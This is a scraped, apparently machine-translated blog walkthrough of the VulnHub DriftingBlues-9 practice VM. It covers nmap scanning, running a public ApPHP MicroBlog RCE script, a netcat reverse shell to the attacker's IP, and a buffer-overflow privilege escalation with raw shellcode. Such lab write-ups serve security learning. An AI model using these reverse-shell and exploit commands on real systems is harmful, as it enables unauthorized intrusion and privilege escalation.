当前位置:网站首页>After reading this article, I will teach you to play with the penetration test target vulnhub - drivetingblues-9
After reading this article, I will teach you to play with the penetration test target vulnhub - drivetingblues-9
2022-07-03 01:27:00 【Lonely fish】
Vulnhub Drone aircraft DriftingBlues-9 Penetration test details
Vulnhub Introduction to target machine :
vulnhub It is a comprehensive shooting range providing various vulnerability platforms , A variety of virtual machines can be downloaded , Local VM Open the can , Complete the penetration test like a game 、 Raise the right 、 Exploit 、 Code audit and other interesting actual combat .
Update this issue Vulnhub DriftingBlues series I still found it as usual FLAG that will do , May be biased towards CTF spot .
Vulnhub Target download :
Official website address :https://www.vulnhub.com/entry/driftingblues-9-final,695/

After downloading, unzip the installation package Then try VMware that will do .
Vulnhub Detailed explanation of target vulnerability :
①: information gathering :
kali Use in netdiscover Discover the host 
Infiltration machine :kali IP :192.168.205.133 Drone aircraft IP :192.168.205.145
Use command :
nmap -sS -A -T4 -n 192.168.205.145

Open the 80 Port and 111 port As usual, visit first 80 port Look directly at the source code Found out ApPHP MicroBlog edition by v.1.0.1( The first time I met )

②: Exploit :
Use searchsploit Search for related vulnerabilities The second one can be used

Use the command to copy the script to the local :searchsploit -m php/webapps/33070.py
Use python2 Execute the script :python2 ./33070.py http://192.168.205.145
Found database information There is an account number and password Namely :clapton/yaraklitepe
Use command :ls /home Discovery is the same as data users It's fine too cat /etc/passwd Check to see if there is nc: whish nc


③: rebound shell:
stay kali Turn on nc monitor :nc -lvp 6666
stay shell perform :nc 192.168.205.133 6666 -e /bin/bash
Use command interaction shell:python -c 'import pty;pty.spawn("/bin/bash")'

Try switching users :clapton / yaraklitepe Got the first flag

④: Buffer overflow right extraction :
Tips here Buffer is the solution ( What buffer !!! The first encounter will not pwn)
for i in {
1..10000}; do (./input $(python -c 'print("A" * 171 + "\x10\x0c\x97\xbf" + "\x90"* 1000 + "\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80")')); done
Specific reference :https://www.ngui.cc/article/show-373956.html
https://blog.csdn.net/qq_32261191/article/details/117908644
⑤: obtain flag:

So far, we have obtained all flag, End of penetration test .
Vulnhub Target penetration summary :
①:searchsploit Tool usage
②:RCE Exploit
③: Buffer overflow right extraction ( Because there is no foundation, it is not very Follow up in learning )
This is also DriftingBlues Study of the last target aircraft in the series , I hope you can also learn some new knowledge points and some penetration testing ideas
Finally, creation is not easy I hope that's helpful !!
边栏推荐
- JS inheritance and prototype chain
- Top ten regular spot trading platforms 2022
- 数学知识:Nim游戏—博弈论
- Canvas drawing -- bingdd
- Excel calculates the difference between time and date and converts it into minutes
- Using tensorboard to visualize the model, data and training process
- MySQL foundation 06 DDL
- Mathematical knowledge: step Nim game game game theory
- Leetcode 6103 - minimum fraction to delete an edge from the tree
- Basic remote connection tool xshell
猜你喜欢
![[fh-gfsk] fh-gfsk signal analysis and blind demodulation research](/img/8a/8ca80f51a03341c982d52980c54b01.png)
[fh-gfsk] fh-gfsk signal analysis and blind demodulation research

MySQL foundation 04 MySQL architecture

Embrace the safety concept of platform delivery
![[C language] detailed explanation of pointer and array written test questions](/img/24/c2c372b5c435cbd6eb83ac34b68034.png)
[C language] detailed explanation of pointer and array written test questions
![[flutter] icons component (fluttericon Download Icon | customize SVG icon to generate TTF font file | use the downloaded TTF icon file)](/img/ca/1d2473ae51c59b84864352eb17de94.jpg)
[flutter] icons component (fluttericon Download Icon | customize SVG icon to generate TTF font file | use the downloaded TTF icon file)

Androd gradle's substitution of its use module dependency

leetcode 2097 — 合法重新排列数对

1696C. Fishingprince Plays With Array【思维题 + 中间状态 + 优化存储】

【FPGA教程案例6】基于vivado核的双口RAM设计与实现

Esp32 simple speed message test of ros2 (limit frequency)
随机推荐
产业互联网的产业范畴足够大 消费互联网时代仅是一个局限在互联网行业的存在
uniapp组件-uni-notice-bar通告栏
The R language uses the ctree function in the party package to build conditional inference decision trees, uses the plot function to visualize the trained conditional inference decision tree, and the
The difference between tail -f, tail -f and tail
ThinkPHP+Redis实现简单抽奖
MySQL foundation 04 MySQL architecture
Strongly connected components of digraph
[Androd] Gradle 使用技巧之模块依赖替换
[shutter] animation animation (the core class of shutter animation | animation | curvedanimation | animationcontroller | tween)
如今少年已归来,人间烟火气最抚凡人心 复工了~
What operations need attention in the spot gold investment market?
[Arduino experiment 17 L298N motor drive module]
Expérience de recherche d'emploi d'un programmeur difficile
Kivy tutorial how to create drop-down lists in Kivy
Trois tâches principales: asynchrone, courrier et timing
wirehark数据分析与取证A.pacapng
Work experience of a hard pressed programmer
【C语言】指针与数组笔试题详解
d. LDC build shared library
攻克哈希的基本概念与实现